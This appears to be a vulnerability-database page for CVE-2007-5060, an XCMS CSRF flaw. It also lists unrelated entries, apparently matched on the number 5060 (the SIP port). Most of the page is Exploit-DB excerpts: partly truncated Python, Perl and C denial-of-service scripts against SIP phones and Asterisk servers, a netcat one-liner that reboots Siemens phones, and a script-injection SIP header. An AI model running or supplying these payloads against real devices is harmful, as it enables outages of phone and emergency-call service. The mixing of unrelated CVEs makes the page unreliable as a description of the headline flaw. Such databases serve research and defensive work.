CVE-2007-5060
Published 2007-09-24
CVE-2007-5060: Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index.php in XCMS allows remote attackers to change arbitrary…
Priority P418 · medium · 4.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 0.88% (54.6th percentile)
Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index.php in XCMS allows remote attackers to change arbitrary passwords via certain password_ and rpassword_ parameters, possibly related to timestamp values.
CVSS provenance
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_cisco · 3.3 LOW
GHSA
GHSA-7qh9-92w2-gfw9: Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index
ghsa_unreviewed·2022-05-01
CVE-2007-5060 [MEDIUM] CWE-352 GHSA-7qh9-92w2-gfw9: Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index
Cisco
SIP Packets Reload IOS Devices with support for SIP
vendor_cisco·2007-01-31·CVSS 3.3
CVE-2007-0648 [LOW] CWE-399 SIP Packets Reload IOS Devices with support for SIP
Cisco devices running an affected version of Internetwork Operating
System (IOS) which supports Session Initiation Protocol (SIP) are affected by a
vulnerability that may lead to a reload of the device when receiving a specific
series of packets destined to port 5060. This issue is compounded by a related
bug which allows traffic to TCP 5060 and UDP port 5060 on devices not
configured for SIP.
There are no known instances of intentional exploitation of this issue.
However, Cisco has observed data streams that appear to be unintentionally
triggering the vulnerability.
Workarounds exist to mitigate the effects of this problem on devices
which do not require SIP.
This advisory is posted at https://sec.cloudapps.cisco.com/security/center/con
CWE: CWE-399
Bug IDs: CSCsb25337, CSCsh58082
No detection rules found.
Exploit-DB
OpenH323 Opal SIP Protocol - Remote Denial of Service
exploitdb·2009-07-24·CVSS 5.0
CVE-2007-4924 [MEDIUM] OpenH323 Opal SIP Protocol - Remote Denial of Service
---
#!/usr/bin/env python
#
# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)
#
# opal228_dos.py by Jose Miguel Esparza
# 2007-10-08 S21sec labs
import sys,socket
if len(sys.argv) != 3:
    sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE sip:[email protected] SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:-40999990\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 192.168.1.133:5
Exploit-DB
Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
exploitdb·2009-07-24·CVSS 5.0
CVE-2007-4897 [MEDIUM] Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
---
#!/usr/bin/env python
#
# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)
#
# ekiga207_dos.py by Jose Miguel Esparza
# 2007-09-11 S21sec labs
import sys,socket
if len(sys.argv) != 3:
    sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:417\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b7
Exploit-DB
Siemens C450IP/C475IP - Remote Denial of Service
exploitdb·2008-11-24
CVE-2008-7065 Siemens C450IP/C475IP - Remote Denial of Service
---
Hi,
echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u 5060
Will disconnect all current VOIP and PSTN calls and reboot
the C450IP/C475IP devices.
Tested with current firmwares.
Vendor (Siemens) was contacted 11/2007, no fix supplied yet.
Have phun!
sky & Any
# milw0rm.com [2008-11-24]
Exploit-DB
Cisco Phone 7940 - Remote Denial of Service
exploitdb·2007-12-05
CVE-2007-5583 Cisco Phone 7940 - Remote Denial of Service
---
#!/usr/bin/perl
###############################
# Vulnerability discovered using KiF ~ Kiph
#
# Authors:
# Humberto J. Abdelnur (Ph.D Student)
# Radu State (Ph.D)
# Olivier Festor (Ph.D)
#
# Madynes Team, LORIA - INRIA Lorraine
# http://madynes.loria.fr
###############################
use IO::Socket::INET;
use String::Random;
die "Usage $0 "
unless ($ARGV[3]);
$targetUser = $ARGV[1];
$targetIP = $ARGV[0];
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[2];
$socket=new IO::Socket::INET->new(
Proto=>'udp',
PeerPort=>5060,
PeerAddr=>$targetIP,
LocalPort=>5060);
$foo = new String::Random;
$flag = 0;
@calls;
$threads = 0;
while ($flag == 0){
$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP";
$cseq = $foo->randregex('\d\d\d\d');
$msg = "
Exploit-DB
Linksys SPA941 - 'SIP From' HTML Injection
exploitdb·2007-10-09
CVE-2007-5411 Linksys SPA941 - 'SIP From' HTML Injection
---
source: https://www.securityfocus.com/bid/25987/info
Linksys SPA941 devices are prone to an HTML-injection vulnerability because the built-in webserver fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Linksys SPA941 devices with firmware version 5.1.8 are vulnerable; other versions may also be affected.
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.1.9:5060;rport
To: sip:[email protected]
From: "alert('hack')""natraj" ;tag=002f
Exploit-DB
XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution
exploitdb·2007-09-22
CVE-2007-5060 XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution
---
source: https://www.securityfocus.com/bid/25771/info
Xcms is prone to a vulnerability that lets attackers execute arbitrary PHP code because the application fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary malicious PHP code in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
-XCMS Arbitrary Command Execution Vuln by x0kster -
- [XCMS All Version Arbitrary Command Execution Vulnerability ] -
- [Bug found by x0kster - x0kster (at) gmail (dot) com [email concealed] ] -
Password :
Repete password :
Exploit-DB
Linksys SPA941 - Remote Reboot (Denial of Service)
exploitdb·2007-04-24
CVE-2007-2270 Linksys SPA941 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 " unless ($ARGV[2]);
die "Usage $0 " unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377;tag=779\r
To: Receiver \r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 \r
Expire
Exploit-DB
Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service
exploitdb·2007-03-25
CVE-2007-1561 Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service
---
#!/usr/bin/perl
# perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[5]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg="INVITE sip:$ARGV[2]\@$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nContent-Type: application/sdp\r\nCSeq: 01 INVITE\r\nContent-Length: 187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4 $ARGV[3]\r\ns=session\r\nc=IN IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0 0\r\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\r\na=rtpmap:98 speex/16000\r\n\r\n";
$socket->send($msg);
# milw0rm.com [2007-03-2
Exploit-DB
Asterisk 1.2.15/1.4.0 - Remote Denial of Service
exploitdb·2007-03-04
CVE-2007-1306 Asterisk 1.2.15/1.4.0 - Remote Denial of Service
---
/*
this will cause asterisk to segfault,
the bug that this exploits has been patched in release 1.2.16 & 1.4.1
CLI>
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1082719152 (LWP 2510)]
register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0)
at chan_sip.c:8257
8257 while (*t && *t > ' ' && *t != ';')
(gdb)
build:
gcc -o asterisk-sip-killer asterisk-sip-killer.c
run:
./asterisk-sip-killer -h
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIP_UDP_PORT 5060
struct udp_session {
int sd;
struct sockaddr_in saddr;
};
int make_udp(struct udp_session *p, char *remotehost, int port)
{
int sd;
int ret;
struct sockaddr_in saddr;
struct hostent *he;
sd
No writeups or analysis indexed.
http://secunia.com/advisories/26941
http://securityreason.com/securityalert/3165
http://www.securityfocus.com/archive/1/480326/100/0/threaded
http://www.securityfocus.com/bid/25771
https://exchange.xforce.ibmcloud.com/vulnerabilities/36755
Published 2007-09-24